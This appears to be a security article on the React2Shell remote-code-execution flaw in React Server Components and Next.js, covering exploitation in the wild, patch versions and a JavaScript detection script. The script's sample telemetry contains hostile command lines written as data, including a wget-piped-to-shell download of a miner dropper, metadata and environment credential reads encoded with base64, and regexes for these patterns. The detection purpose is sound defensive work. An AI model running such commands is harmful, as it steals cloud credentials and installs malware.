What Is React2Shell (CVE-2025-55182)?
React2Shell (CVE-2025-55182) is a maximum-severity vulnerability with a CVSS score of 10.0 affecting React Server Components and the Next.js 15.x and 16.x release lines. Disclosed on December 3, 2025, the flaw lets an unauthenticated attacker execute arbitrary code on the server with a single malicious HTTP request. Within hours of disclosure, China-nexus threat groups were actively exploiting vulnerable servers for cryptomining, credential theft, and backdoor installation.
If you’re running Next.js 15.x or 16.x in production, patch immediately. This isn’t a drill: active exploitation is happening right now.
Why This Is Maximum Severity
A CVSS 10.0 score is as bad as it gets. React2Shell earned it because exploitation requires no authentication and no user interaction, and it can be done with a single HTTP POST request. The exploit is highly reliable, and public proof-of-concept code is already circulating.
The vulnerability is in React’s Flight protocol, the wire format React Server Components use to serialize component trees and server-function calls between server and client. The server-side decoder that parses client-supplied Flight payloads did not adequately validate them, so a crafted request can make the server reconstruct attacker-controlled objects in a privileged server context. In practice that means an attacker can run whatever code they want with the privileges of the Node.js process that serves your app.
Here’s the kicker: default configurations are vulnerable. A standard create-next-app build is exploitable out of the box with zero code changes by the developer. According to React’s security advisory, the decoder trusted deserialized data by default, which is a catastrophic design choice for a component whose whole job is to receive untrusted input.
Active Exploitation in the Wild
Darktrace reported that one of its honeypots was exploited less than two minutes after being exposed. That’s not a typo. Speed like that only comes from automated scanning and exploitation pipelines, and attackers had them running almost as soon as the advisory and the public proof-of-concepts appeared.
Within hours of the December 3 disclosure, Amazon and Google threat intelligence teams observed exploitation by China-nexus groups including Earth Lamia and Jackpot Panda. By December 5, multiple victims had been compromised, primarily internet-facing Next.js applications and Kubernetes containers running React Server Components.
The attacks weren’t theoretical. Observed post-exploitation activity includes deployment of the XMRig cryptocurrency miner (via a script charmingly named “sex.sh”), harvesting of AWS credentials from environment variables and the cloud instance metadata service, installation of the Sliver command-and-control framework, and staging of Base64-encoded credentials for exfiltration.
If you haven’t patched, assume your server is already compromised: hunt for those indicators, rotate every credential the web process could read, and don’t treat patching alone as remediation. That’s the reality of a CVSS 10.0 vulnerability under active exploitation.
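As an added example (this is not code from the article, nor from Amazon, Google or Darktrace), here is the kind of detection logic a responder would run over process-execution telemetry from a Next.js host. The log lines are constructed for this example, and the indicator patterns are illustrative assumptions rather than vendor-published IoCs: they encode only the behaviours reported above (the web server process spawning a shell, instance-metadata and environment credential reads, Base64 staging, the XMRig miner and the “sex.sh” dropper name). The generic signal, a shell child of the node or next-server process, is the one that survives when the attacker renames the script.

```javascript
// Added example, not code from the article or from Amazon, Google or Darktrace.
// Scans process-execution telemetry for the post-exploitation behaviour
// described above. Log format and indicator patterns are assumptions made
// for this example, not vendor-published IoCs.

// String indicators, each tied to a behaviour named in the reporting above.
const INDICATORS = [
  { tag: "imds_credential_access", re: /169\.254\.169\.254/ },              // cloud instance metadata service
  { tag: "env_credential_read",    re: /\bprintenv\b|\benv\b|AWS_(ACCESS_KEY_ID|SECRET_ACCESS_KEY|SESSION_TOKEN)/ },
  { tag: "xmrig_miner",            re: /xmrig/i },
  { tag: "known_dropper_name",     re: /\bsex\.sh\b/ },                      // miner installer script name
  { tag: "base64_staging",         re: /\bbase64\b/ },                       // encoding loot for exfiltration
  { tag: "remote_fetch_to_shell",  re: /\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b/ }, // download-and-run one-liner
];

// A Next.js server process has no business spawning a shell at all; a shell
// child of one of these parents is the generic "someone got RCE" signal.
const WEB_SERVER_PARENTS = new Set(["node", "next-server"]);
const SHELL_CMD = /^(\/bin\/|\/usr\/bin\/)?(ba|da)?sh\b/;

// Returns the indicator tags matched by one process-start event.
function classify(event) {
  const tags = INDICATORS.filter(i => i.re.test(event.cmd)).map(i => i.tag);
  if (WEB_SERVER_PARENTS.has(event.parent) && SHELL_CMD.test(event.cmd)) {
    tags.unshift("shell_spawned_by_web_server");
  }
  return tags;
}

// Parses JSON-lines telemetry and returns only the events worth a responder's time.
function scan(lines) {
  return lines
    .map(line => JSON.parse(line))
    .map(e => ({ ts: e.ts, parent: e.parent, cmd: e.cmd, tags: classify(e) }))
    .filter(r => r.tags.length > 0);
}

// Constructed sample telemetry (one JSON object per line: timestamp, parent
// process name, full command line). 203.0.113.10 is a documentation address.
const SAMPLE_LOG = [
  '{"ts":"2025-12-04T02:11:08Z","parent":"next-server","cmd":"/bin/sh -c curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ | base64 -w0"}',
  '{"ts":"2025-12-04T02:11:09Z","parent":"node","cmd":"/bin/sh -c wget -qO- http://203.0.113.10/sex.sh | sh"}',
  '{"ts":"2025-12-04T02:11:15Z","parent":"node","cmd":"sh -c printenv | grep AWS_ | base64"}',
  '{"ts":"2025-12-04T02:12:40Z","parent":"sshd","cmd":"/usr/bin/xmrig -o pool.example:3333"}',
  '{"ts":"2025-12-04T02:13:00Z","parent":"node","cmd":"node /app/node_modules/.bin/next start"}',
  '{"ts":"2025-12-04T03:00:00Z","parent":"cron","cmd":"/bin/sh -c /usr/local/bin/logrotate.sh"}',
];

for (const hit of scan(SAMPLE_LOG)) {
  console.log(`${hit.ts} parent=${hit.parent} tags=${hit.tags.join(",")}  cmd=${hit.cmd}`);
}
```

Run against the sample, the first three events (all children of the web server) are flagged, the miner started under sshd is flagged on its name alone, and the two benign events produce nothing. Feed it your own process-audit export in the same shape, or adapt `scan` to your EDR’s format; the point is the parent-process check, not the string list.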
Who’s Affected and How Big Is This?
React powers over 11 million websites, and Next.js is the de facto standard framework for React applications. Even though only 29% of developers say they have explicitly adopted React Server Components, millions of apps are affected because RSC is what the App Router uses, and create-next-app has scaffolded App Router projects by default since Next.js 13.4. Many developers are running vulnerable code they never consciously chose.
Affected versions are Next.js 15.0.0 through 16.0.6, plus the React 19.x Server Components packages (react-server-dom-webpack, react-server-dom-turbopack and react-server-dom-parcel) in any framework that embeds them. If you’re running any of these in production, you’re in the blast radius. The comparison to Log4Shell isn’t hyperbole: both are CVSS 10.0, both affect millions of applications, and both were weaponized within hours of disclosure.
How to Patch React2Shell
The fix is straightforward, but you need to act immediately. The fastest method is Vercel’s fix tool:
npx fix-react2shell-next
Alternatively, manually update to patched versions:
npm install next@14.2.35 # For Next.js 13.3+ and 14.x
npm install next@15.5.7 # For Next.js 15.x
npm install next@16.0.7 # For Next.js 16.x
Critical note: if you already patched on December 3, you need to patch again. While analyzing the initial fix, researchers found two further issues, a denial-of-service bug (CVE-2025-55184) and a source-code exposure bug (CVE-2025-55183), which were fixed in additional releases on December 11. The Next.js versions listed above are the December 3 releases; re-run the fix tool or install the latest patch release on your line so that both rounds are covered.
After updating, verify that package.json and package-lock.json reflect the new versions, that no nested copy of an old next or react-server-dom-* package survives under another dependency, and test your application. WAF rules from Vercel, AWS, and Cloudflare provide partial protection, but they cannot guarantee defense against every exploit variant. Patching is the only reliable solution, and if the server was exposed before you patched, rotate any secrets the web process could read from its environment or from the instance metadata service.
Lessons from React’s Log4Shell Moment
Vercel’s response was nothing short of heroic. The team ran a 24/7 operation for weeks (“nobody slept through the weekend, nobody slept through the night,” according to the Vercel CTO). They launched a HackerOne bounty program paying $50,000 per verified bypass technique and ultimately paid out $1 million for 20 unique bypasses found by 116 researchers. That effort blocked over 6 million exploit attempts.
But here’s the uncomfortable question: should frameworks default to experimental features in the first place? React Server Components were bleeding edge when Next.js made them the default. The performance gains are impressive, with initial render times reportedly dropping by 67%, but at what cost?
This incident exposed the danger of a “move fast, break security” culture. Defaulting to experimental features without rigorous security review put millions of applications at risk, most of them run by developers who never explicitly opted into RSC and did not know they were exposed.
The lesson is clear: frameworks need to be secure by default. Experimental features with large attack surfaces shouldn’t become production defaults until they’ve been battle-tested. And for developers, dependency updates aren’t optional maintenance tasks; they’re emergency security patches. If you’re running production React or Next.js, you own your security posture.
React and Next.js aren’t inherently insecure, but React2Shell proved that trusting framework defaults can be catastrophic. Patch immediately, monitor for signs of compromise, and remember: security isn’t someone else’s problem. It’s yours.